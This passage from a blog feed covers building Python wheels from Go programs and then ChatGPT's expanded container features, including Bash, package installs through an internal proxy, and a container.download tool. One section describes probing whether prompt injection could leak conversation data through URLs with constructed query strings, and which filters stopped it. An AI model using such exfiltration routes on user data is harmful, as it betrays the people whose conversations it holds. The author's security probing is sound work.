&lt;p&gt;If you peek at the code you'll see it &lt;a href="https://github.com/simonw/datasette-scan/blob/1a2b6d1e6b04c8cd05f5676ff7daa877efd99f08/pyproject.toml#L14"&gt;depends on sqlite-scanner&lt;/a&gt; in &lt;code&gt;pyproject.toml&lt;/code&gt; and calls it using &lt;code&gt;subprocess.run()&lt;/code&gt; against &lt;code&gt;sqlite_scanner.get_binary_path()&lt;/code&gt; in its own &lt;a href="https://github.com/simonw/datasette-scan/blob/1a2b6d1e6b04c8cd05f5676ff7daa877efd99f08/datasette_scan/__init__.py#L38-L58"&gt;scan_directories() function&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;I've been exploring this pattern for other, non-Go binaries recently - here's &lt;a href="https://github.com/simonw/tools/blob/main/python/livestream-gif.py"&gt;a recent script&lt;/a&gt; that depends on &lt;a href="https://pypi.org/project/static-ffmpeg/"&gt;static-ffmpeg&lt;/a&gt; to ensure that &lt;code&gt;ffmpeg&lt;/code&gt; is available for the script to use.&lt;/p&gt;
&lt;h4 id="building-python-wheels-from-go-packages-with-go-to-wheel"&gt;Building Python wheels from Go packages with go-to-wheel&lt;/h4&gt;
&lt;p&gt;After trying this pattern myself a couple of times I realized it would be useful to have a tool to automate the process.&lt;/p&gt;
&lt;p&gt;I first &lt;a href="https://claude.ai/share/2d9ced56-b3e8-4651-83cc-860b9b419187"&gt;brainstormed with Claude&lt;/a&gt; to check that there was no existing tool to do this. It pointed me to &lt;a href="https://www.maturin.rs/bindings.html#bin"&gt;maturin bin&lt;/a&gt; which helps distribute Rust projects using Python wheels, and &lt;a href="https://github.com/Bing-su/pip-binary-factory"&gt;pip-binary-factory&lt;/a&gt; which bundles all sorts of other projects, but did not identify anything that addressed the exact problem I was looking to solve.&lt;/p&gt;
&lt;p&gt;So I &lt;a href="https://gisthost.github.io/?41f04e4eb823b1ceb888d9a28c2280dd/index.html"&gt;had Claude Code for web build the first version&lt;/a&gt;, then refined the code locally on my laptop with the help of more Claude Code and a little bit of OpenAI Codex too, just to mix things up.&lt;/p&gt;
&lt;p&gt;The full documentation is in the &lt;a href="https://github.com/simonw/go-to-wheel"&gt;simonw/go-to-wheel&lt;/a&gt; repository. I've published that tool to PyPI so now you can run it using:&lt;/p&gt;
&lt;div class="highlight highlight-source-shell"&gt;&lt;pre&gt;uvx go-to-wheel --help&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The &lt;code&gt;sqlite-scanner&lt;/code&gt; package you can &lt;a href="https://pypi.org/project/sqlite-scanner/"&gt;see on PyPI&lt;/a&gt; was built using &lt;code&gt;go-to-wheel&lt;/code&gt; like this:&lt;/p&gt;
&lt;div class="highlight highlight-source-shell"&gt;&lt;pre&gt;uvx go-to-wheel &lt;span class="pl-k"&gt;~&lt;/span&gt;/dev/sqlite-scanner \
  --set-version-var main.version \
  --version 0.1.1 \
  --readme README.md \
  --author &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;'&lt;/span&gt;Simon Willison&lt;span class="pl-pds"&gt;'&lt;/span&gt;&lt;/span&gt; \
  --url https://github.com/simonw/sqlite-scanner \
  --description &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;'&lt;/span&gt;Scan directories for SQLite databases&lt;span class="pl-pds"&gt;'&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;This created a set of wheels in the &lt;code&gt;dist/&lt;/code&gt; folder. I tested one of them like this:&lt;/p&gt;
&lt;div class="highlight highlight-source-shell"&gt;&lt;pre&gt;uv run --with dist/sqlite_scanner-0.1.1-py3-none-macosx_11_0_arm64.whl \
  sqlite-scanner --version&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;When that spat out the correct version number I was confident everything had worked as planned, so I pushed the whole set of wheels to PyPI using &lt;code&gt;twine upload&lt;/code&gt; like this:&lt;/p&gt;
&lt;div class="highlight highlight-source-shell"&gt;&lt;pre&gt;uvx twine upload dist/&lt;span class="pl-k"&gt;*&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;I had to paste in a PyPI API token I had saved previously.&lt;/p&gt;
&lt;h4 id="i-expect-to-use-this-pattern-a-lot"&gt;I expect to use this pattern a lot&lt;/h4&gt;
&lt;p&gt;&lt;code&gt;sqlite-scanner&lt;/code&gt; is very clearly meant as a proof-of-concept for this wider pattern - Python is very much capable of recursively crawling a directory structure looking for files that start with a specific byte prefix on its own!&lt;/p&gt;
&lt;p&gt;That said, I think there's a &lt;em&gt;lot&lt;/em&gt; to be said for this pattern. Go is a great complement to Python - it's fast, compiles to small self-contained binaries, has excellent concurrency support and a rich ecosystem of libraries.&lt;/p&gt;
&lt;p&gt;Go is similar to Python in that it has a strong standard library. Go is particularly good for HTTP tooling - I've built several HTTP proxies in the past using Go's excellent &lt;code&gt;net/http/httputil.ReverseProxy&lt;/code&gt; handler.&lt;/p&gt;
&lt;p&gt;I've also been experimenting with &lt;a href="https://github.com/wazero/wazero"&gt;wazero&lt;/a&gt;, a robust and mature zero-dependency WebAssembly runtime written in Go, as part of my ongoing quest for the ideal sandbox for running untrusted code. &lt;a href="https://github.com/simonw/research/tree/main/wasm-repl-cli"&gt;Here's my latest experiment&lt;/a&gt; with that library.&lt;/p&gt;
&lt;p&gt;Being able to seamlessly integrate Go binaries into Python projects without the end user having to think about Go at all - they &lt;code&gt;pip install&lt;/code&gt; and everything Just Works - feels like a valuable addition to my toolbox.&lt;/p&gt;
    
        &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/go"&gt;go&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/packaging"&gt;packaging&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/projects"&gt;projects&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/pypi"&gt;pypi&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/python"&gt;python&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sqlite"&gt;sqlite&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/datasette"&gt;datasette&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai-assisted-programming"&gt;ai-assisted-programming&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/uv"&gt;uv&lt;/a&gt;&lt;/p&gt;
    

</summary><category term="go"/><category term="packaging"/><category term="projects"/><category term="pypi"/><category term="python"/><category term="sqlite"/><category term="datasette"/><category term="ai-assisted-programming"/><category term="uv"/></entry><entry><title>ChatGPT Containers can now run bash, pip/npm install packages, and download files</title><link href="https://simonwillison.net/2026/Jan/26/chatgpt-containers/#atom-tag" rel="alternate"/><published>2026-01-26T19:19:31+00:00</published><updated>2026-01-26T19:19:31+00:00</updated><id>https://simonwillison.net/2026/Jan/26/chatgpt-containers/#atom-tag</id><summary type="html">
    &lt;p&gt;One of my favourite features of ChatGPT is its ability to write and execute code in a container. This feature launched as ChatGPT Code Interpreter &lt;a href="https://simonwillison.net/2023/Apr/12/code-interpreter/"&gt;nearly three years ago&lt;/a&gt;, was half-heartedly rebranded to "Advanced Data Analysis" at some point and is generally really difficult to find detailed documentation about. Case in point: it appears to have had a &lt;em&gt;massive&lt;/em&gt; upgrade at some point in the past few months, and I can't find documentation about the new capabilities anywhere!&lt;/p&gt;
&lt;p&gt;Here are the most notable new features:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;ChatGPT can &lt;strong&gt;directly run Bash commands&lt;/strong&gt; now. Previously it was limited to Python code only, although it could run shell commands via the Python &lt;code&gt;subprocess&lt;/code&gt; module.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;It has Node.js&lt;/strong&gt; and can run JavaScript directly in addition to Python. I also got it to run "hello world" in &lt;strong&gt;Ruby, Perl, PHP, Go, Java, Swift, Kotlin, C and C++&lt;/strong&gt;. No Rust yet though!&lt;/li&gt;
&lt;li&gt;While the container still can't make outbound network requests, &lt;strong&gt;&lt;code&gt;pip install package&lt;/code&gt; and &lt;code&gt;npm install package&lt;/code&gt; both work&lt;/strong&gt; now via a custom proxy mechanism.&lt;/li&gt;
&lt;li&gt;ChatGPT can locate the URL for a file on the web and use a &lt;code&gt;container.download&lt;/code&gt; tool to &lt;strong&gt;download that file and save it to a path&lt;/strong&gt; within the sandboxed container.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;This is a substantial upgrade! ChatGPT can now write and then test code in 10 new languages (11 if you count Bash), can find files online and download them into the container, and can install additional packages via &lt;code&gt;pip&lt;/code&gt; and &lt;code&gt;npm&lt;/code&gt; to help it solve problems.&lt;/p&gt;
&lt;p&gt;(OpenAI &lt;em&gt;really&lt;/em&gt; need to develop better habits at &lt;a href="https://help.openai.com/en/articles/6825453-chatgpt-release-notes"&gt;keeping their release notes up-to-date&lt;/a&gt;!)&lt;/p&gt;
&lt;p&gt;I was initially suspicious that maybe I'd stumbled into a new preview feature that wasn't available to everyone, but I &lt;a href="https://chatgpt.com/share/6977aa7c-7bd8-8006-8129-8c9e25126fed"&gt;tried some experiments&lt;/a&gt; in a free ChatGPT account and confirmed that the new features are available there as well.&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;&lt;a href="https://simonwillison.net/2026/Jan/26/chatgpt-containers/#container-download"&gt;container.download&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href="https://simonwillison.net/2026/Jan/26/chatgpt-containers/#is-container-download-a-data-exfiltration-vulnerability-"&gt;Is container.download a data exfiltration vulnerability?&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href="https://simonwillison.net/2026/Jan/26/chatgpt-containers/#bash-and-other-languages"&gt;Bash and other languages&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href="https://simonwillison.net/2026/Jan/26/chatgpt-containers/#installing-packages-from-pip-and-npm"&gt;Installing packages from pip and npm&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href="https://simonwillison.net/2026/Jan/26/chatgpt-containers/#adding-it-all-together"&gt;Adding it all together&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h4 id="container-download"&gt;container.download&lt;/h4&gt;
&lt;p&gt;My first clue to the new features came the other day when I got curious about Los Angeles air quality - in particular, whether the growing number of electric vehicles there has had a measurable impact.&lt;/p&gt;
&lt;p&gt;I prompted a fresh GPT-5.2 Thinking session with:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Show me Los Angeles air quality over time for last 20 years&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Here's the &lt;a href="https://chatgpt.com/share/6977a80d-e6e4-8006-b4fe-ed8478fe99d8"&gt;shared transcript&lt;/a&gt;. Annoyingly that doesn't make the thinking trace available, so here's a screenshot:&lt;/p&gt;
&lt;p&gt;&lt;img src="https://static.simonwillison.net/static/2026/container-download.jpg" alt="Exploring methods to fetch AQI data and reports Downloading AQI data for Los Angeles  I found an xlsx file titled &amp;quot;Air Quality Statistics by City, 2000-2023&amp;quot;, which should include data for Los Angeles. While user requested data for Using provided URL to download file  The URL from the error message leads to an Excel file containing air quality trends. I can use the container.download tool to fetch it. Let’s proceed with this approach and see if it works out for downloading the file directly! Analyzed Parsing and analyzing the data for Los Angeles  Now that we've downloaded the data, I'll parse it using Python. First, I'll focus on identifying the row(s) corresponding to Los Angeles, which may be labeled under &amp;quot;Los Angeles-Long Beach-Anaheim, CA.&amp;quot; Afterward, I'll plot metrics like &amp;quot;Median AQI&amp;quot; and &amp;quot;Days Good&amp;quot; over time to visualize trends. Let’s begin!" style="max-width: 100%;" /&gt;&lt;/p&gt;
&lt;p&gt;This bit instantly caught my eye:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;[...] The URL from the error message leads to an Excel file containing air quality trends. I can use the container.download tool to fetch it. [...]&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;What's &lt;code&gt;container.download&lt;/code&gt;? I &lt;a href="https://chatgpt.com/share/6977aab0-b874-8006-9b54-d3d216ed884b"&gt;asked ChatGPT&lt;/a&gt;:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Without running any searches tell me about your container.download tool&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;And got back:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Sure. &lt;code&gt;container.download&lt;/code&gt; is a built-in tool I can call that &lt;strong&gt;fetches a file from a URL and saves it into the sandboxed container filesystem&lt;/strong&gt; for this chat session.&lt;/p&gt;
&lt;h4 id="what-it-does"&gt;What it does&lt;/h4&gt;
&lt;ul&gt;
&lt;li&gt;Takes a &lt;strong&gt;publicly reachable URL&lt;/strong&gt; and a &lt;strong&gt;destination filepath&lt;/strong&gt; in the container.&lt;/li&gt;
&lt;li&gt;Downloads the bytes from that URL and writes them to the given path.&lt;/li&gt;
&lt;li&gt;After that, I can read/process the file locally in the container (e.g., unzip it, parse it with Python, open it as an image, convert it, etc.).&lt;/li&gt;
&lt;/ul&gt;
&lt;h4 id="signature-inputs-"&gt;Signature (inputs)&lt;/h4&gt;
&lt;p&gt;It’s called like this (conceptually):&lt;/p&gt;
&lt;div class="highlight highlight-source-json"&gt;&lt;pre&gt;{
  &lt;span class="pl-ent"&gt;"url"&lt;/span&gt;: &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;https://example.com/somefile.zip&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;,
  &lt;span class="pl-ent"&gt;"filepath"&lt;/span&gt;: &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;/mnt/data/somefile.zip&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;
}&lt;/pre&gt;&lt;/div&gt;
&lt;/blockquote&gt;
&lt;p&gt;Further experimentation confirmed that &lt;code&gt;container.download&lt;/code&gt; behaves as described.&lt;/p&gt;
&lt;p&gt;I had it download one file from a server with logs enabled and captured the IP address and user-agent. Here are the most interesting headers:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;User-Agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko); compatible; ChatGPT-User/1.0; +https://openai.com/bot
Accept: text/html, application/xhtml+xml, application/xml;q=0.9, image/avif, image/webp, image/apng, */*;q=0.8, application/signed-exchange;v=b3;q=0.9
Cf-Connecting-Ip: 52.230.164.178
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;That &lt;code&gt;52.230.164.178&lt;/code&gt; IP address &lt;a href="http://ip-api.com/json/52.230.164.178"&gt;resolves to&lt;/a&gt; Microsoft Azure Cloud (centralus) in Des Moines, Iowa.&lt;/p&gt;
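&lt;p&gt;If you want to run the same experiment, a tiny Python server that records incoming request headers is enough. This is my own sketch, not anything ChatGPT-specific - the &lt;code&gt;/probe.txt&lt;/code&gt; path is arbitrary:&lt;/p&gt;

```python
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

captured = {}  # headers sent by the most recent client, keys lower-cased


class HeaderLogger(BaseHTTPRequestHandler):
    """Serve a tiny file and record the headers each client sends."""

    def do_GET(self):
        captured.update({k.lower(): v for k, v in self.headers.items()})
        body = b"hello"
        self.send_response(200)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):
        pass  # silence per-request logging


# Port 0 asks the OS for any free port
server = HTTPServer(("127.0.0.1", 0), HeaderLogger)
threading.Thread(target=server.serve_forever, daemon=True).start()

# Expose the public equivalent of this URL, have ChatGPT download it,
# then inspect `captured`
url = f"http://127.0.0.1:{server.server_address[1]}/probe.txt"
```

&lt;p&gt;Point &lt;code&gt;container.download&lt;/code&gt; at a publicly reachable version of that URL and the user-agent and connecting IP show up in &lt;code&gt;captured&lt;/code&gt;.&lt;/p&gt;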
&lt;h4 id="is-container-download-a-data-exfiltration-vulnerability-"&gt;Is container.download a data exfiltration vulnerability?&lt;/h4&gt;
&lt;p&gt;On the one hand, this is really useful! ChatGPT can navigate around websites looking for useful files, download those files to a container and then process them using Python or other languages.&lt;/p&gt;
&lt;p&gt;Is this a data exfiltration vulnerability though? Could a prompt injection attack trick ChatGPT into leaking private data via a &lt;code&gt;container.download&lt;/code&gt; call to a URL whose query string includes sensitive information?&lt;/p&gt;
&lt;p&gt;I don't think it can. I tried getting it to assemble a URL with a query string and access it using &lt;code&gt;container.download&lt;/code&gt; and it couldn't do it. It told me that it got back this error:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;ERROR: download failed because url not viewed in conversation before. open the file or url using web.run first.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;This looks to me like the same safety trick &lt;a href="https://simonwillison.net/2025/Sep/10/claude-web-fetch-tool/"&gt;used by Claude's Web Fetch tool&lt;/a&gt;: only allow URL access if that URL was either directly entered by the user or if it came from search results that could not have been influenced by a prompt injection.&lt;/p&gt;
&lt;p&gt;(I poked at this a bit more and managed to get a simple constructed query string to pass through &lt;code&gt;web.run&lt;/code&gt; - a different tool entirely - but when I tried to compose a longer query string containing the previous prompt history a &lt;code&gt;web.run&lt;/code&gt; filter blocked it.)&lt;/p&gt;
&lt;p&gt;So I &lt;em&gt;think&lt;/em&gt; this is all safe, though I'm curious if it could hold firm against a more aggressive round of attacks from a seasoned security researcher.&lt;/p&gt;
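&lt;p&gt;The behaviour that error message implies can be sketched as a simple allow-list. This is my guess at the logic, not OpenAI's actual implementation:&lt;/p&gt;

```python
class DownloadGate:
    """Only allow downloads of URLs already "viewed" in the conversation,
    i.e. entered by the user or opened via the browsing tool - sources a
    prompt injection cannot trivially influence."""

    def __init__(self):
        self.viewed = set()

    def mark_viewed(self, url):
        # Called whenever the browsing tool successfully opens a URL
        self.viewed.add(url)

    def download(self, url, filepath):
        if url not in self.viewed:
            raise PermissionError(
                "download failed because url not viewed in conversation "
                "before. open the file or url using web.run first."
            )
        return (url, filepath)  # the real tool would fetch and save here
```

&lt;p&gt;An attacker-constructed URL with secrets packed into the query string fails the viewed check, because it never came from the user or from search results.&lt;/p&gt;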
&lt;h4 id="bash-and-other-languages"&gt;Bash and other languages&lt;/h4&gt;
&lt;p&gt;The key lesson from coding agents like Claude Code and Codex CLI is that Bash rules everything: if an agent can run Bash commands in an environment it can do almost anything that can be achieved by typing commands into a computer.&lt;/p&gt;
&lt;p&gt;When Anthropic added their own code interpreter feature to Claude &lt;a href="https://simonwillison.net/2025/Sep/9/claude-code-interpreter/"&gt;last September&lt;/a&gt; they built that around Bash rather than just Python. It looks to me like OpenAI have now done the same thing for ChatGPT.&lt;/p&gt;
&lt;p&gt;Here's what ChatGPT looks like when it runs a Bash command - here my prompt was:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;npm install a fun package and demonstrate using it&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;&lt;img src="https://static.simonwillison.net/static/2026/chatgpt-bash.jpg" alt="Screenshot of ChatGPT 5.2 Thinking interface with Activity panel. Main chat shows user prompt &amp;quot;npm install a fun package and demonstrate using it&amp;quot; and response &amp;quot;Thought for 32s &amp;gt; Yep — here's a fun one: cowsay 🐄 I installed it with npm and ran a tiny Node script:&amp;quot; followed by bash code block containing &amp;quot;mkdir -p /mnt/data/npmfun cd /mnt/data/npmfun npm init -y npm install cowsay --no-fund --no-audit node -e &amp;quot;const cowsay=require('cowsay'); console.log(cowsay.say({text:'Hel&amp;quot; and Output: section showing ASCII cow art saying &amp;quot;&amp;lt; Hello from npm inside the container! &amp;gt;&amp;quot; with cow drawing made of characters. Activity panel on right (32s) shows: &amp;quot;Running npm install in container&amp;quot; with bash command and output &amp;quot;v22.16.0 10.9.2&amp;quot;, &amp;quot;Inspecting npm command output and container status&amp;quot; with directory listing showing &amp;quot;drwxr-xr-x 2 root oai_shared 80 Jan 26 17:32 . drwxrwxr-x 2 oai oai_shared 60 Jan 26 17:32 .. -rw-r--r-- 1 root root&amp;quot;, &amp;quot;Re-running npm install&amp;quot; note about node_modules missing, and &amp;quot;Rerunning npm install with output&amp;quot; showing &amp;quot;added 41 packages in 2s&amp;quot;." style="max-width: 100%;" /&gt;&lt;/p&gt;
&lt;p&gt;It's useful to click on the "Thinking" or "Thought for 32s" links as that opens the Activity sidebar with a detailed trace of what ChatGPT did to arrive at its answer. This helps guard against cheating - ChatGPT might claim to have run Bash in the main window but it can't fake those black and white logs in the Activity panel.&lt;/p&gt;
&lt;p&gt;I had it run &lt;a href="https://chatgpt.com/share/6977b890-f1c0-8006-b39a-9a02c7ca1993"&gt;Hello World in various languages&lt;/a&gt; later in that same session.&lt;/p&gt;
&lt;p&gt;&lt;img src="https://static.simonwillison.net/static/2026/chatgpt-hello-worlds.jpg" alt="Terminal screenshot showing &amp;quot;Hello, world&amp;quot; programs in multiple languages. Top section shows code: swift -e 'print(&amp;quot;Hello, world from Swift!&amp;quot;)' followed by cat &amp;gt; hello.kts &amp;lt;&amp;lt;'KTS' / println(&amp;quot;Hello, world from Kotlin!&amp;quot;) / KTS / kotlinc -script hello.kts, then cat &amp;gt; hello.c &amp;lt;&amp;lt;'C' / #include &amp;lt;stdio.h&amp;gt; / int main(){ puts(&amp;quot;Hello, world from C!&amp;quot;); return 0; } / C / gcc hello.c -o hello_c / ./hello_c, then cat &amp;gt; hello.cpp &amp;lt;&amp;lt;'CPP' / #include &amp;lt;iostream&amp;gt; / int main(){ std::cout &amp;lt;&amp;lt; &amp;quot;Hello, world from C++!&amp;quot; &amp;lt;&amp;lt; std::endl; } / CPP / g++ hello.cpp -o hello_cpp / ./hello_cpp. Bottom section shows output: Hello, world from Ruby! / Hello, world from Perl! / Hello, world from PHP! / Hello, world from Go! / Hello, world from Java! / Hello, world from Swift! / Hello, world from Kotlin! / Hello, world from C! / Hello, world from C++!. UI shows &amp;quot;Thought for 2m 29s&amp;quot; and &amp;quot;Done&amp;quot; at bottom." style="max-width: 100%;" /&gt;&lt;/p&gt;
&lt;h4 id="installing-packages-from-pip-and-npm"&gt;Installing packages from pip and npm&lt;/h4&gt;
&lt;p&gt;In the previous example ChatGPT installed the &lt;code&gt;cowsay&lt;/code&gt; package from npm and used it to draw an ASCII-art cow. But how could it do that if the container can't make outbound network requests?&lt;/p&gt;
&lt;p&gt;In &lt;a href="https://chatgpt.com/share/69773501-b6d8-8006-bbf2-fa644561aa26"&gt;another session&lt;/a&gt; I challenged it to explore its environment and figure out how that worked.&lt;/p&gt;
&lt;p&gt;Here's &lt;a href="https://github.com/simonw/research/blob/main/chatgpt-container-environment/README.md"&gt;the resulting Markdown report&lt;/a&gt; it created.&lt;/p&gt;
&lt;p&gt;The key magic appears to be an &lt;code&gt;applied-caas-gateway1.internal.api.openai.org&lt;/code&gt; proxy, available within the container, with various packaging tools configured to use it.&lt;/p&gt;
&lt;p&gt;The following environment variables cause &lt;code&gt;pip&lt;/code&gt; and &lt;code&gt;uv&lt;/code&gt; to install packages from that proxy instead of directly from PyPI:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;PIP_INDEX_URL=https://reader:****@packages.applied-caas-gateway1.internal.api.openai.org/.../pypi-public/simple
PIP_TRUSTED_HOST=packages.applied-caas-gateway1.internal.api.openai.org
UV_INDEX_URL=https://reader:****@packages.applied-caas-gateway1.internal.api.openai.org/.../pypi-public/simple
UV_INSECURE_HOST=https://packages.applied-caas-gateway1.internal.api.openai.org
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This one appears to get &lt;code&gt;npm&lt;/code&gt; to work:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;NPM_CONFIG_REGISTRY=https://reader:****@packages.applied-caas-gateway1.internal.api.openai.org/.../npm-public
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And it reported these suspicious-looking variables as well:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;CAAS_ARTIFACTORY_BASE_URL=packages.applied-caas-gateway1.internal.api.openai.org
CAAS_ARTIFACTORY_PYPI_REGISTRY=.../artifactory/api/pypi/pypi-public
CAAS_ARTIFACTORY_NPM_REGISTRY=.../artifactory/api/npm/npm-public
CAAS_ARTIFACTORY_GO_REGISTRY=.../artifactory/api/go/golang-main
CAAS_ARTIFACTORY_MAVEN_REGISTRY=.../artifactory/maven-public
CAAS_ARTIFACTORY_GRADLE_REGISTRY=.../artifactory/gradle-public
CAAS_ARTIFACTORY_CARGO_REGISTRY=.../artifactory/api/cargo/cargo-public/index
CAAS_ARTIFACTORY_DOCKER_REGISTRY=.../dockerhub-public
CAAS_ARTIFACTORY_READER_USERNAME=reader
CAAS_ARTIFACTORY_READER_PASSWORD=****
NETWORK=caas_packages_only
&lt;/code&gt;&lt;/pre&gt;
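&lt;p&gt;No pip configuration files are needed for this trick: pip treats any environment variable named &lt;code&gt;PIP_&lt;/code&gt; followed by the upper-cased option name as the equivalent command-line flag. A quick sketch of that mapping - the conversion rule is pip's documented behaviour, the function name is mine:&lt;/p&gt;

```python
def pip_env_var(option: str) -> str:
    """Convert a pip command-line option to the environment variable
    pip reads instead: strip leading dashes, swap dashes for
    underscores, upper-case, and prefix with PIP_."""
    return "PIP_" + option.lstrip("-").replace("-", "_").upper()


# PIP_INDEX_URL is exactly equivalent to passing --index-url
print(pip_env_var("--index-url"))      # PIP_INDEX_URL
print(pip_env_var("--trusted-host"))   # PIP_TRUSTED_HOST
```

&lt;p&gt;So setting &lt;code&gt;PIP_INDEX_URL&lt;/code&gt; redirects every &lt;code&gt;pip install&lt;/code&gt; in the container to the proxy without touching any files on disk.&lt;/p&gt;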
&lt;p&gt;Neither Rust nor Docker is installed in the container environment, but maybe those registry references are a clue of features still to come.&lt;/p&gt;
&lt;h4 id="adding-it-all-together"&gt;Adding it all together&lt;/h4&gt;
&lt;p&gt;The result of all of this? You can tell ChatGPT to use Python or Node.js packages as part of a conversation and it will be able to install them and apply them against files you upload or that it downloads from the public web. That's &lt;em&gt;really&lt;/em&gt; cool.&lt;/p&gt;
&lt;p&gt;The big missing feature here should be the easiest to provide: we need &lt;strong&gt;official documentation&lt;/strong&gt;! A release notes entry would be a good start, but there are a lot of subtle details about how this new stuff works, its limitations, and what it can be used for.&lt;/p&gt;
&lt;p&gt;As always, I'd also encourage OpenAI to come up with a name for this set of features that properly represents how it works and what it can do.&lt;/p&gt;
&lt;p&gt;In the meantime, I'm going to call this &lt;strong&gt;ChatGPT Containers&lt;/strong&gt;.&lt;/p&gt;
&lt;h4 id="list-of-tools"&gt;Update: a full list of tools&lt;/h4&gt;
&lt;p&gt;I decided to ask ChatGPT about other tools that were available to it in case there was anything interesting in there:&lt;/p&gt;
&lt;blockquote&gt;&lt;p&gt;List all tools that are available to you, with their exact names and descriptions and signatures&lt;/p&gt;&lt;/blockquote&gt;
&lt;p&gt;Here's &lt;a href="https://chatgpt.com/share/6977ffa0-df14-8006-9647-2b8c90ccbb81"&gt;what I got back&lt;/a&gt;.&lt;/p&gt;

&lt;details&gt;&lt;summary&gt;List of ChatGPT tools according to GPT-5.2 Thinking on 26th January 2026&lt;/summary&gt;
&lt;p style="margin-top: 1em"&gt;Below are &lt;strong&gt;all tools available to me in this chat&lt;/strong&gt;, with their &lt;strong&gt;exact names&lt;/strong&gt;, &lt;strong&gt;descriptions&lt;/strong&gt;, and &lt;strong&gt;signatures&lt;/strong&gt; (as defined in my tool interface).&lt;/p&gt;
&lt;hr /&gt;
&lt;h4 id="python"&gt;python&lt;/h4&gt;
&lt;h5 id="python-exec-freeform-any"&gt;
&lt;code&gt;python.exec&lt;/code&gt; (FREEFORM) → any&lt;/h5&gt;
&lt;p&gt;&lt;strong&gt;Description:&lt;/strong&gt; Execute Python code in a Jupyter environment for &lt;em&gt;private/internal reasoning&lt;/em&gt; (not shown to you). Internet access is disabled.&lt;br /&gt;
&lt;strong&gt;Signature:&lt;/strong&gt; &lt;code&gt;python.exec(FREEFORM) -&amp;gt; any&lt;/code&gt;&lt;/p&gt;
&lt;hr /&gt;
&lt;h4 id="web"&gt;web&lt;/h4&gt;
&lt;h5 id="web-run-toolcallv5-json-any"&gt;
&lt;code&gt;web.run&lt;/code&gt; (ToolCallV5 JSON) → any&lt;/h5&gt;
&lt;p&gt;&lt;strong&gt;Description:&lt;/strong&gt; Access the internet and specialized lookups (search, open/click/find pages, screenshot PDFs, image search, product search, finance, weather, sports, calculator, time). Supports citations via returned &lt;code&gt;turn...&lt;/code&gt; reference IDs.&lt;br /&gt;
&lt;strong&gt;Signature:&lt;/strong&gt;&lt;br /&gt;
&lt;code&gt;web.run({ open?, click?, find?, screenshot?, image_query?, product_query?, sports?, finance?, weather?, calculator?, time?, search_query?, response_length? }) -&amp;gt; any&lt;/code&gt;&lt;/p&gt;
&lt;hr /&gt;
&lt;h4 id="automations"&gt;automations&lt;/h4&gt;
&lt;h5 id="automations-create-any"&gt;
&lt;code&gt;automations.create&lt;/code&gt; → any&lt;/h5&gt;
&lt;p&gt;&lt;strong&gt;Description:&lt;/strong&gt; Schedule a future/recurring task/reminder/search via iCal VEVENT.&lt;br /&gt;
&lt;strong&gt;Signature:&lt;/strong&gt;&lt;br /&gt;
&lt;code&gt;automations.create({ prompt: string, title: string, schedule?: string, dtstart_offset_json?: string }) -&amp;gt; any&lt;/code&gt;&lt;/p&gt;
&lt;h5 id="automations-update-any"&gt;
&lt;code&gt;automations.update&lt;/code&gt; → any&lt;/h5&gt;
&lt;p&gt;&lt;strong&gt;Description:&lt;/strong&gt; Modify an existing scheduled task.&lt;br /&gt;
&lt;strong&gt;Signature:&lt;/strong&gt;&lt;br /&gt;
&lt;code&gt;automations.update({ jawbone_id: string, schedule?: string, dtstart_offset_json?: string, prompt?: string, title?: string, is_enabled?: boolean }) -&amp;gt; any&lt;/code&gt;&lt;/p&gt;
&lt;h5 id="automations-list-any"&gt;
&lt;code&gt;automations.list&lt;/code&gt; → any&lt;/h5&gt;
